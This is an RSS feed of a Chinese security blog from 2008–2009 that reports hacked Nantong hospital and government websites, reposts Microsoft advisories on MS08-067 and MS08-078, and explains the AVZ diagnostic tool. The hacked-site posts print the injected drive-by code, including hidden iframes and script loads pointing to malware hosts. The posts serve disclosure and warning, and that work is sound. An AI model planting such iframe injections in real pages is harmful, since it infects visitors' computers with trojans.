<?xml version="1.0" encoding="gb2312"?>
<rss version="2.0">
<channel>
<title><![CDATA[killvir]]></title>
        <image>
        <title>http://hi.baidu.com</title>
        <link>http://hi.baidu.com</link>
        <url>http://img.baidu.com/img/logo-hi.gif</url>
        </image>
<description><![CDATA[因借鉴本博客内容操作而造成的损失，本人不承担责任。作者killvir保留本博客的所有权利，转贴请注明出处，严禁抄袭篡改。]]></description>
<link>http://hi.baidu.com/killvir</link>
<language>zh-cn</language>
<generator>www.baidu.com</generator>
<ttl>5</ttl>


<item>
        <title><![CDATA[“南通市中医院”网站服务器受到恶意代码攻击]]></title>
        <link><![CDATA[http://hi.baidu.com/killvir/blog/item/9ba7d9f9b10b4953252df2b0.html]]></link>
        <description><![CDATA[
		
		<p>&ldquo;南通市中医院&rdquo;网站服务器受到恶意代码攻击，上面多个医院网站受其影响。</p>
<p>ntzyy.com&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  南通市中医院<br>
nhtcm.com&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  南通市中医院<br>
ntskqyy.com&nbsp;&nbsp;&nbsp;&nbsp;  南通市口腔医院<br>
ntyxh.com&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  南通市医学会<br>
ntfkyy.com&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  南通市肺科医院<br>
南通美容整形.com  中文域名</p>
<p>恶意代码如下：</p>
<p>&quot;%73%70%6F%72%74%73%62%61%79%2E%63%6E&quot;<br>
download：hxxp://d.fgddx.com/xx/x2.css<br>
<img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/killvir/pic/item/9b9526974391644154fb9630.jpg"></p>
<p>google显示以前受过攻击，还有有私服建立<img src="http://img.baidu.com/hi/jx/j_0012.gif">，这就是南通服务器安全水平？</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/killvir/pic/item/417cb31c7d81f8a786d6b632.jpg"></p>
<p>疑为内部网络安全受ARP攻击威胁</p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/killvir/blog/category/%B1%BB%BA%DA%D5%BE%B5%E3">被黑站点</a>&nbsp;<a href="http://hi.baidu.com/killvir/blog/item/9ba7d9f9b10b4953252df2b0.html#comment">查看评论</a>]]></description>
        <pubDate>2009-09-26  17:52</pubDate>
        <category><![CDATA[被黑站点]]></category>
        <author><![CDATA[killvir]]></author>
		<guid>http://hi.baidu.com/killvir/blog/item/9ba7d9f9b10b4953252df2b0.html</guid>
</item>

<item>
        <title><![CDATA[台北911]]></title>
        <link><![CDATA[http://hi.baidu.com/killvir/blog/item/528a720e7273d5c07acbe157.html]]></link>
        <description><![CDATA[
		
		<p><strong><font color="#ff0000" size="5">911台前领导人陈水扁案终结，&ldquo;世纪审判&rdquo;中台北地方法院一审判处陈水扁无期徒刑，罚金2亿；吴淑珍无期徒刑，罚金逾3亿；陈致中被判2年6个月，罚金1.5亿；黄睿靓被判1年8个月，资产没收。</font></strong></p>
<p><strong><font color="#ff0000" size="5">试想中国大陆潜在的那么多贪赃枉法者，何时才能被挖出并绳之以法！<img src="http://img.baidu.com/hi/face/i_f06.gif"></font></strong></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/killvir/blog/category/%D3%E9%C0%D6%D7%CA%D1%B6">娱乐资讯</a>&nbsp;<a href="http://hi.baidu.com/killvir/blog/item/528a720e7273d5c07acbe157.html#comment">查看评论</a>]]></description>
        <pubDate>2009-09-11  19:48</pubDate>
        <category><![CDATA[娱乐资讯]]></category>
        <author><![CDATA[killvir]]></author>
		<guid>http://hi.baidu.com/killvir/blog/item/528a720e7273d5c07acbe157.html</guid>
</item>

<item>
        <title><![CDATA[C.I.S.R.T.  2009Spring]]></title>
        <link><![CDATA[http://hi.baidu.com/killvir/blog/item/1fca85352cf6181690ef39b8.html]]></link>
        <description><![CDATA[
		
		<div class="cnt">
<p> </p>
<strong><font color="#3366ff">
<div forimg="1"><a target="_blank" href="http://www.cisrt.org/images/2009spring.jpg"><img class="blogimg" border="0" small="0" src="http://www.cisrt.org/images/2009spring.jpg"></a></div>
</font></strong>
<p><strong><font color="#3366ff">C.I.S.R.T.</font></strong></p>
<p><a target="_blank" href="http://www.cisrt.org/logo.gif"><img class="blogimg" height="31" width="88" border="0" small="0" src="http://www.cisrt.org/logo.gif"></a></p>
<div forimg="1"><a href="http://www.cisrt.org/">http://www.cisrt.org/</a></div>
<div forimg="1"> </div>
<div forimg="1"> </div>
<div forimg="1"><a href="http://www.cisrt.org/blog">http://www.cisrt.org/blog</a></div>
<div forimg="1"> </div>
<div forimg="1"> </div>
<div forimg="1"><a href="http://www.cisrt.org/enblog">http://www.cisrt.org/enblog</a></div>
<div forimg="1"> </div>
<div forimg="1"> </div>
<div forimg="1"> </div>
<div forimg="1"> </div>
<div forimg="1"><strong><font color="#3366ff">Chinese Internet Security Response Team</font></strong></div>
<p> </p>
<div forimg="1"> </div>
<div forimg="1"> </div>
<div forimg="1"> </div>
<p> </p>
<div forimg="1"> </div>
</div>
<p> </p>
<p><strong><font color="#3366ff">Email:</font></strong><a href="mailto:killvir@cisrt.org"><strong><font color="#3366ff">killvir@cisrt.org</font></strong></a></p>
<p><strong><font color="#3366ff">Please compress files in .RAR or .ZIP file and add the password: virus</font></strong></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/killvir/blog/category/it%D7%CA%D1%B6">it资讯</a>&nbsp;<a href="http://hi.baidu.com/killvir/blog/item/1fca85352cf6181690ef39b8.html#comment">查看评论</a>]]></description>
        <pubDate>2009-02-27  12:57</pubDate>
        <category><![CDATA[it资讯]]></category>
        <author><![CDATA[killvir]]></author>
		<guid>http://hi.baidu.com/killvir/blog/item/1fca85352cf6181690ef39b8.html</guid>
</item>

<item>
        <title><![CDATA[MS08-078严重等级漏洞补丁终于发布-KB960714]]></title>
        <link><![CDATA[http://hi.baidu.com/killvir/blog/item/002865383323fb2496ddd8c0.html]]></link>
        <description><![CDATA[
		
		<p>Microsoft 安全公告 MS08-078 - 严重<br>
Internet Explorer 安全更新 (960714)<br>
发布日期： 十二月 17, 2008  版本： 1.0</p>
<p>摘要<br>
此安全更新解决了一个公开披露的漏洞。 如果用户使用 Internet Explorer 查看特制网页，则该漏洞可能允许远程执行代码。 那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。</p>
<p>对于 Internet Explorer 5.01、Internet Explorer 6、Internet Explorer 6 Service Pack 1 和 Internet Explorer 7，此安全更新的等级为&ldquo;严重&rdquo;。有关 Internet Explorer 8 Beta 2 的信息，请参阅&ldquo;与此安全更新相关的常见问题 (FAQ)&rdquo;部分。 有关详细信息，请参阅本节中&ldquo;受影响和不受影响的软件&rdquo;小节。</p>
<p>此安全更新通过修改 Internet Explorer 验证数据绑定参数并处理产生可利用条件的错误的方式来消除此漏洞。 有关漏洞的详细信息，请参阅下一节&ldquo;漏洞信息&rdquo;下面的常见问题 (FAQ) 小节。</p>
<p>此安全更新也解决了 Microsoft 安全通报 961051 中最初描述的漏洞。</p>
<p>建议。 Microsoft 建议用户立即应用此更新。</p>
<p>已知问题。 无</p>
<p>详情：<a href="http://www.microsoft.com/china/technet/security/bulletin/MS08-078.mspx">http://www.microsoft.com/china/technet/security/bulletin/MS08-078.mspx</a></p>
<p><font color="#ff0000">受影响软件：Internet Explorer 5.01、Internet Explorer 6、Internet Explorer 6 Service Pack 1 和 Internet Explorer 7</font></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/killvir/blog/category/it%D7%CA%D1%B6">it资讯</a>&nbsp;<a href="http://hi.baidu.com/killvir/blog/item/002865383323fb2496ddd8c0.html#comment">查看评论</a>]]></description>
        <pubDate>2008-12-18  13:50</pubDate>
        <category><![CDATA[it资讯]]></category>
        <author><![CDATA[killvir]]></author>
		<guid>http://hi.baidu.com/killvir/blog/item/002865383323fb2496ddd8c0.html</guid>
</item>

<item>
        <title><![CDATA[NSDownLoader近期非常活跃，建议大家打上MS08067补丁]]></title>
        <link><![CDATA[http://hi.baidu.com/killvir/blog/item/5b27a0ec280b013a279791c5.html]]></link>
        <description><![CDATA[
		
		<p><font color="#ff0000">NSDownLoader</font>近期非常活跃，数据显示该网马更新频繁，肉鸡数量上升！</p>
<p>主要是该马中含有<font color="#ff0000">MS08067漏洞</font>攻击模块，建议大家根据自身系统打全它！</p>
<p><a href="http://www.microsoft.com/china/technet/security/bulletin/MS08-067.mspx">http://www.microsoft.com/china/technet/security/bulletin/MS08-067.mspx</a></p>
<p>Microsoft 安全公告 MS08-067 - 严重<br>
服务器服务中的漏洞可能允许远程执行代码 (958644)<br>
发布日期： 十月 23, 2008<br>
版本： 1.0<br>
摘要<br>
此安全更新解决了服务器服务中一个秘密报告的漏洞。 如果用户在受影响的系统上收到特制的 RPC 请求，则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上，攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。 防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。</p>
<p>对于 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 的所有受支持版本，此安全更新的等级为&ldquo;严重&rdquo;；对于 Windows Vista、Windows Server 2008 和 Windows 7 Beta 的所有受支持版本，此安全更新的等级为&ldquo;重要&rdquo;。 有关详细信息，请参阅本节中&ldquo;受影响和不受影响的软件&rdquo;小节。</p>
<p>该安全更新通过更正服务器服务处理 RPC 请求的方式来解决该漏洞。 有关漏洞的详细信息，请参阅下一节&ldquo;漏洞信息&rdquo;下面特定漏洞条目的常见问题 (FAQ) 小节。</p>
<p>建议。 Microsoft 建议用户立即应用此更新</p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/killvir/blog/category/it%D7%CA%D1%B6">it资讯</a>&nbsp;<a href="http://hi.baidu.com/killvir/blog/item/5b27a0ec280b013a279791c5.html#comment">查看评论</a>]]></description>
        <pubDate>2008-12-06  10:56</pubDate>
        <category><![CDATA[it资讯]]></category>
        <author><![CDATA[killvir]]></author>
		<guid>http://hi.baidu.com/killvir/blog/item/5b27a0ec280b013a279791c5.html</guid>
</item>

<item>
        <title><![CDATA[Wii]]></title>
        <link><![CDATA[http://hi.baidu.com/killvir/blog/item/3145ab64e69a28f7f63654e1.html]]></link>
        <description><![CDATA[
		
		<p> </p>
<div forimg="1" align="center">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/killvir/mpic/item/1d8260594170f9372934f047.jpg"></p>
<p> </p>
<p align="center" forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/killvir/pic/item/b1630a46a54093146a63e541.jpg"></p>
<p align="left" forimg="1">游戏碟，怎么弄呢</p>
</div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/killvir/blog/category/%D0%C4%C7%E9%C8%D5%BC%C7">心情日记</a>&nbsp;<a href="http://hi.baidu.com/killvir/blog/item/3145ab64e69a28f7f63654e1.html#comment">查看评论</a>]]></description>
        <pubDate>2008-12-06  09:58</pubDate>
        <category><![CDATA[心情日记]]></category>
        <author><![CDATA[killvir]]></author>
		<guid>http://hi.baidu.com/killvir/blog/item/3145ab64e69a28f7f63654e1.html</guid>
</item>

<item>
        <title><![CDATA[南通市 崇川区 人事劳动和社会保障局网 被恶意注入代码]]></title>
        <link><![CDATA[http://hi.baidu.com/killvir/blog/item/98ced0161beda71f962b431c.html]]></link>
        <description><![CDATA[
		
		<p>南通市 崇川区 人事劳动和社会保障局网 被恶意注入代码<br>
hxxp://www.jschongchuan.lss.gov.cn</p>
<p>在脚本hxxp://www.jschongchuan.lss.gov.cn/FS_Inc/Prototype.js<br>
底部被注入代码如下：<br>
document.write(&quot;&lt;script src=\&quot;hxxp://www.iis51.com/cms_app/ad_4.js\&quot;&gt;&lt;\/script&gt;&quot;);<br>
内容为：<br>
function Get(){<br>
var Then = new Date() <br>
Then.setTime(Then.getTime() + 24*60*60*1000)<br>
var cookieString = new String(document.cookie)<br>
var cookieHeader = &quot;Cookie1=&quot; <br>
var beginPosition = cookieString.indexOf(cookieHeader)<br>
if (beginPosition != -1){ <br>
} else <br>
{ document.cookie = &quot;Cookie1=risb;expires=&quot;+ Then.toGMTString()<br>
document.write(&quot;&lt;div style=\&quot;display:none\&quot;&gt;&quot;);<br>
document.writeln(&quot;&lt;iframe src=\&quot;hxxp://www.hryspao.cn/one/a11.htm\&quot;width=50 height=0&gt;&lt;/iframe&gt;&quot;);<br>
document.write ('&lt;script language=&quot;javascript&quot; type=&quot;text/javascript&quot; src=&quot;hxxp://js.users.51.la/2056079.js&quot;&gt;&lt;/script&gt;');<br>
}<br>
}Get();</p>
<p><br>
另一脚本hxxp://www.jschongchuan.lss.gov.cn/Ads/2.js<br>
底部被注入代码如下：<br>
document.write('&lt;iframe height=0 width=0 src=&quot;hxxp://cncncncncncncncncncncncncncncn.cn/ie.htm?id=999&quot;&gt;&lt;/iframe&gt;');</p>
<p><br>
第一个被挂的是当前正在流行的木马群，第二个是SEX网弹窗刷流量。南通市 崇川区 人事劳动和社会保障局网，这样一个公开与民众紧密相关的政务网站，它的安全性确实值得关注！</p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/killvir/blog/category/it%D7%CA%D1%B6">it资讯</a>&nbsp;<a href="http://hi.baidu.com/killvir/blog/item/98ced0161beda71f962b431c.html#comment">查看评论</a>]]></description>
        <pubDate>2008-11-04  14:38</pubDate>
        <category><![CDATA[it资讯]]></category>
        <author><![CDATA[killvir]]></author>
		<guid>http://hi.baidu.com/killvir/blog/item/98ced0161beda71f962b431c.html</guid>
</item>

<item>
        <title><![CDATA[Creating an &#34;AVZ Sysinfo log&#34; using KAV/KIS 2009 & AVZ Antiviral Toolkit]]></title>
        <link><![CDATA[http://hi.baidu.com/killvir/blog/item/6ea74bfbd2c3a163034f56b9.html]]></link>
        <description><![CDATA[
		
		<p> </p>
<p>Creating an &quot;AVZ Sysinfo log&quot; using KAV/KIS 2009</p>
<div forimg="1">The AVZ Sysinfo tool collects information about your system (such as running processes, loaded modules and files that run on startup) and converts this information into a logfile. This logfile can then be analysed by our malware experts and moderators, which in turn help us diagnose and remove an infection.</div>
<p>If you are having a problem with an infection that is not detected/can not be deleted by Kaspersky, or an AVZ log has been requested by a moderator, please follow the instructions below on creating it.<br>
<br>
To create an AVZ logfile, please launch Kaspersky and click on &quot;Support&quot; in the bottom left hand corner of the main screen. Then click on &quot;Support Tools&quot;. A new window will open, and underneath the &quot;Actions&quot; heading you will find a button labelled &quot;Create system state report&quot;. Click this button to create the AVZ sysinfo log.</p>
<p>Once your system has been analysed, click on &quot;View&quot; in order to open the logfile location. <br>
The logfile should be located in C:\Documents and Settings\All Users\Application Data\Kaspersky Lab\AVP8\AVZ folder and will be called sysinfo.zip (for Windows Vista this will be C:\ProgramData\Kaspersky Lab\AVP8\AVZ). Please collect this file, and attach it to your post/topic.</p>
<p><br>
The animation below demonstrates how to create an AVZ sysinfo logfile:</p>
<p> </p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://www.malwarecrawler.com/klposts/sysanalyser/avz_sysinfo.gif"></p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p>巴斯基辅助软件 AVZ Antiviral Toolkit 简介</p>
<div class="t_msgfont">
<p>卡巴斯基工程师奥列格*扎伊采夫（奥列格是名，扎伊采夫是姓，扎伊采夫在俄语里是兔子的意思，估计祖上与兔子有着不解之缘）自己编写了一个集病毒扫描、反Rootkit、系统诊断、系统修复等众多功能于一身的安全软件AVZ Antiviral Toolkit（此软件现已属于卡巴斯基实验室）。此软件功能强大，怎奈只有英俄两种语言的版本，且宣传甚少，一直未被广大的中国用户所认识。我这里为大家简单介绍一下这一杀毒利器。<br>
<br>
AVZ可以清除以下类型的恶意程序：<br>
<br>
1. 间谍软件与广告软件 - 这是AVZ的首要任务。<br>
2. 恶意拨号程序<br>
3. 特洛伊木马程序<br>
4. 后门程序<br>
5. 网络与电子邮件蠕虫<br>
6. 下载者<br>
<br>
此外它还有以下功能和特性：<br>
<br>
1. 启发式的系统检查。<br>
2. 白名单文件库。<br>
3. Rootkit检测。<br>
4. Keylogger与木马Dll检测。<br>
5. Winsock SPI/LSP分析。<br>
6. 进程、服务、驱动管理器。<br>
7. 文件搜索，可以搜索用Rootkit技术隐藏的文件。<br>
8. TCP/UDP分析。<br>
9. 网络资源分析。<br>
10. 下载文件分析。<br>
11. 系统修复。<br>
12. 压缩包文件检查，目前支持ZIP、RAR、CAB、GZIP、TAR，另外还支持电子邮件的MHT格式，再有就是CHM格式。<br>
13. NTFS流检查。<br>
14. 脚本管理。用户可以自编脚本是AVZ的一大特色，也是我们即将着重介绍的部分。依靠脚本，您可以自己写专杀、修复系统。怎么样，很期待吧？<br>
15. 进程分析。<br>
16. AVZGuard系统，这个是用来对付极难清除的恶意程序的，它可以反病毒软件实施保护。<br>
17. 直接访问磁盘。支持FAT16/FAT32/NTFS，可以用来对付被占用而无法删除的文件。<br>
18. 进程监视驱动与AVZPM驱动。<br>
19. BootCleaner驱动。</p>
<p>下载地址 <a target="_blank" href="http://z-oleg.com/avz4.zip"><font color="#0000ff">http://z-oleg.com/avz4.zip</font></a></p>
<p>下载地址：<a href="http://devbuilds.kaspersky-labs.com/devbuilds/AVZ/avz4.zip">http://devbuilds.kaspersky-labs.com/devbuilds/AVZ/avz4.zip</a></p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/killvir/pic/item/f3a9213f4b73b0f755e72326.jpg"></p>
</div>
</div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/killvir/blog/category/it%D7%CA%D1%B6">it资讯</a>&nbsp;<a href="http://hi.baidu.com/killvir/blog/item/6ea74bfbd2c3a163034f56b9.html#comment">查看评论</a>]]></description>
        <pubDate>2008-11-03  09:22</pubDate>
        <category><![CDATA[it资讯]]></category>
        <author><![CDATA[killvir]]></author>
		<guid>http://hi.baidu.com/killvir/blog/item/6ea74bfbd2c3a163034f56b9.html</guid>
</item>

<item>
        <title><![CDATA[MS08-067&Microsoft Security Advisory(958963)]]></title>
        <link><![CDATA[http://hi.baidu.com/killvir/blog/item/1fca853529e01b1790ef3989.html]]></link>
        <description><![CDATA[
		
		<p> </p>
<p> </p>
<p>UPDATE(2008.10.28)</p>
<p>Microsoft Security Advisory (958963)</p>
<p><a href="http://www.microsoft.com/technet/security/advisory/958963.mspx">http://www.microsoft.com/technet/security/advisory/958963.mspx</a></p>
<p><br>
Exploit Code Published Affecting the Server Service<br>
Published: October 27, 2008</p>
<p>Microsoft is aware that detailed exploit code demonstrating code execution has been published on the Internet for the vulnerability that is addressed by security update MS08-067. This exploit code demonstrates code execution on Windows 2000, Windows XP, and Windows Server 2003. Microsoft is aware of limited, targeted active attacks that use this exploit code. At this time, there are no self-replicating attacks associated with this vulnerability. Microsoft has activated its Software Security Incident Response Process (SSIRP) and is continuing to investigate this issue.</p>
<p>Our investigation of this exploit code has verified that it does not affect customers who have installed the updates detailed in MS08-067 on their computers.  Microsoft continues to recommend that customers apply the updates to the affected products by enabling the Automatic Updates feature in Windows.</p>
<p>We continue to work with our Microsoft Security Response Alliance (MSRA) and Microsoft Active Protections Program (MAPP) partners so that their products can provide additional protections for customers. We have updated our Windows Live Safety Scanner, Windows Live One Care, and Forefront security products with protections for customers. We have also been working with our partners in the Global Infrastructure Alliance for Internet Safety (GIAIS) program to take steps to help keep attacks from spreading.</p>
<p>Customers who believe they are affected can contact Customer Service and Support. Contact CSS in North America for help with security update issues or viruses at no charge using the PC Safety line (1-866-PCSAFETY). International customers may request help by using any method found at this location: <a href="http://www.microsoft.com/protect/support/default.mspx">http://www.microsoft.com/protect/support/default.mspx</a> (click on the select your region hyperlink in the first paragraph).</p>
<p>Mitigating Factors:</p>
<p> Customers who have installed the MS08-067 security update are not affected by this vulnerability.<br>
 <br>
Windows 2000, Windows XP and Windows Server 2003 systems are primarily at risk from this vulnerability. Customers running these platforms should deploy MS08-067 as soon as possible.<br>
 <br>
While installation of the update is the recommended action, customers who have applied the mitigations as identified in MS08-067 will have minimized their exposure and potential exploitability against an attack.<br>
 </p>
<p>General Information<br>
 Overview</p>
<p>Purpose of Advisory: Notification of the availability of a security update to help protect against this potential threat.</p>
<p>Advisory Status: As this issue is already addressed as part of the MS08-067 security bulletin, no additional update is required.</p>
<p>Recommendation: Install the MS08-067 security update to help protect against this vulnerability.</p>
<p>References Identification <br>
CVE Reference<br>
 CVE-2008-4250<br>
 <br>
Microsoft Knowledge Base Article<br>
 958963<br>
 <br>
Microsoft Security Bulletin<br>
 MS08-067<br>
 <br>
CERT Reference<br>
 VU#827267<br>
 </p>
<p>This advisory discusses the following software.</p>
<p>Related Software <br>
Microsoft Windows 2000 Service Pack 4<br>
 <br>
Windows XP Service Pack 2 and Windows XP Service Pack 3<br>
 <br>
Windows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2<br>
 <br>
Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2<br>
 <br>
Windows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2<br>
 <br>
Windows Server 2003 with SP1 for Itanium-based Systems and Windows Server 2003 with SP2 for Itanium-based Systems<br>
 </p>
<p>Top of section<br>
 Frequently Asked Questions</p>
<p>What is the scope of the advisory? <br>
Microsoft is aware of public posting of exploit code targeting the vulnerability identified in Microsoft Security Update MS08-067. This affects the software that is listed in the &ldquo;Overview&rdquo; section.</p>
<p>Is this a security vulnerability that requires Microsoft to issue a security update? <br>
Microsoft addressed this security vulnerability in MS08-067. Customers who have installed the MS08-067 security update are not affected by this vulnerability. No additional update is required.</p>
<p>What causes the vulnerability? <br>
The Server service does not properly handle specially crafted RPC requests.</p>
<p>What might an attacker use the vulnerability to do? <br>
An attacker could exploit this vulnerability over RPC without authentication to run arbitrary code. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.</p>
<p>What is the Server service? <br>
The Server service provides RPC support, file and print support, and named pipe sharing over the network. The Server service allows the sharing of your local resources (such as disks and printers) so that other users on the network can access them. It also allows named pipe communication between applications running on other computers and your computer, which is used for RPC.</p>
<p>What is RPC? <br>
Remote Procedure Call (RPC) is a protocol that a program can use to request a service from a program located on another computer in a network. RPC helps with interoperability because the program using RPC does not have to understand the network protocols that are supporting communication. In RPC, the requesting program is the client and the service-providing program is the server.</p>
<p>Are there any known issues with installing the Microsoft Security Update that protects against this threat? <br>
No. Microsoft continues to encourage customers to install the update immediately.</p>
<p>Top of section<br>
 Suggested Actions</p>
<p>If you have installed the update released with Security Bulletin MS08-067, you are already protected from the attack identified in the publicly posted proof of concept code. If you have not installed the update, you are encouraged to apply the workarounds identified in MS08-067.</p>
<p> Protect Your PC</p>
<p>We continue to encourage customers to follow our Protect Your Computer guidance of enabling a firewall, getting software updates and installing antivirus software. Customers can learn more about these steps by visiting Protect Your Computer.<br>
 <br>
Keep Windows Updated</p>
<p>All Windows users should apply the latest Microsoft security updates to help make sure that their computers are as protected as possible. If you are not sure whether your software is up to date, visit Windows Update, scan your computer for available updates, and install any high-priority updates that are offered to you. If you have Automatic Updates enabled, the updates are delivered to you when they are released, but you have to make sure you install them.<br>
 <br>
Apply workarounds listed in the Microsoft Bulletin</p>
<p>Security Bulletin MS08-067 lists the applicable workarounds that can be used to protect systems from this vulnerability.<br>
 </p>
<p>Top of section<br>
Resources:</p>
<p> You can provide feedback by completing the form by visiting Microsoft Help and Support: Contact Us.<br>
 <br>
Customers in the United States and Canada can receive technical support from Microsoft Product Support Services. For more information about available support options, see Microsoft Help and Support.<br>
 <br>
International customers can receive support from their local Microsoft subsidiaries. For more information about how to contact Microsoft for international support issues, visit International Support.<br>
 <br>
Microsoft TechNet Security provides additional information about security in Microsoft products.<br>
 </p>
<p>Disclaimer:</p>
<p>The information provided in this advisory is provided &quot;as is&quot; without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.</p>
<p>Revisions:</p>
<p> October 27, 2008: Advisory published<br>
 </p>
<p><a href="http://blogs.technet.com/msrc/archive/2008/10/27/microsoft-security-advisory-958963.aspx">http://blogs.technet.com/msrc/archive/2008/10/27/microsoft-security-advisory-958963.aspx</a></p>
<p><br>
Monday, October 27, 2008 3:26 PM by MSRCTEAM <br>
Microsoft Security Advisory 958963<br>
Hey folks, Mike Reavey here,</p>
<p>It&rsquo;s been almost five days since we originally released MS08-067, and our tracking shows that security deployments remain strong.&nbsp;&nbsp;  We&rsquo;re also still unaware of any application compatibility issues with this update.</p>
<p>Like we&rsquo;ve said, we&rsquo;re continuing to watch the threat environment. Yesterday, we said that our analysis of public exploit code that was available showed it would always result in a denial of service. Today, we&rsquo;ve identified the public availability of exploit code that now shows code execution for the vulnerability addressed by MS08-067. This exploit code has been shown to result in remote code execution on Windows Server 2003, Windows XP, and Windows 2000 systems. Our investigation has shown that it does not affect customers who have installed the update. We&rsquo;ve just published Microsoft Security Advisory 958963 to let customers know about this new development.</p>
<p>At this time, attacks are still limited and targeted, even with the release of this new exploit code.&nbsp;&nbsp;  The malware situation remains the same, as we&rsquo;ve not seen any self-replicating worms, but instead malware that would be classified as Trojans -- specifically the malware we discussed when we released the security update on Thursday.</p>
<p>While there are no new broad attacks from this public exploit code now, we do expect that over the next few days and weeks this public exploit code may likely be used to create new versions of malware that could be used for broader attacks, possibly including self-replicating worms.&nbsp;&nbsp;  Therefore, we continue to strongly encourage customers to test and deploy the security update as quickly as possible.</p>
<p>We will continue to monitor the situation via our ongoing Software Security Incident Response Process (SSIRP) and post updates to the Advisory and the MSRC Blog as we become aware of malware that significantly changes the threat environment.</p>
<p>In the meantime, we continue to urge customers to continue to test and deploy the security update.</p>
<p>-Mike Reavey</p>
<p>McAfee：<a href="http://vil.nai.com/vil/content/v_152892.htm">http://vil.nai.com/vil/content/v_152892.htm</a></p>
<p>dc3fdfde66fffb6cfbec946a237787d8 n1.exe_<br>
f173007fbd8e2190af3be7837acd70a4 n2.exe_<br>
3ee354cc8b63b8849b28e6f376f2b263 n3.exe_<br>
6c3e53864541bb13fa7853f7b580b807 n4.exe_<br>
24cd978da62cff8370b83c26e134ff4c n5.exe_<br>
86d75ae361637a8f9114bb3a40f710d3 n6.exe_<br>
ee70f981514803e1fb4e6b65f492a56d n7.exe_<br>
8d66f28d028a4838d09ce4b91d35b7cb n8.exe_<br>
477aac8d472a7bea8b906718a2f50c67 n9.exe_</p>
<p><a href="http://hi.baidu.com/micropoint/blog/item/176ed10983e66784d1581b11.html">http://hi.baidu.com/micropoint/blog/item/176ed10983e66784d1581b11.html</a></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/killvir/blog/category/it%D7%CA%D1%B6">it资讯</a>&nbsp;<a href="http://hi.baidu.com/killvir/blog/item/1fca853529e01b1790ef3989.html#comment">查看评论</a>]]></description>
        <pubDate>2008-10-27  20:42</pubDate>
        <category><![CDATA[it资讯]]></category>
        <author><![CDATA[killvir]]></author>
		<guid>http://hi.baidu.com/killvir/blog/item/1fca853529e01b1790ef3989.html</guid>
</item>

<item>
        <title><![CDATA[黑色桌面]]></title>
        <link><![CDATA[http://hi.baidu.com/killvir/blog/item/2c657b89a91de1b50f24449f.html]]></link>
        <description><![CDATA[
		
		<p> </p>
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/killvir/pic/item/0955fc0342e9eb93d53f7c14.jpg"></div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/killvir/blog/category/it%D7%CA%D1%B6">it资讯</a>&nbsp;<a href="http://hi.baidu.com/killvir/blog/item/2c657b89a91de1b50f24449f.html#comment">查看评论</a>]]></description>
        <pubDate>2008-10-21  16:03</pubDate>
        <category><![CDATA[it资讯]]></category>
        <author><![CDATA[killvir]]></author>
		<guid>http://hi.baidu.com/killvir/blog/item/2c657b89a91de1b50f24449f.html</guid>
</item>


</channel>
</rss>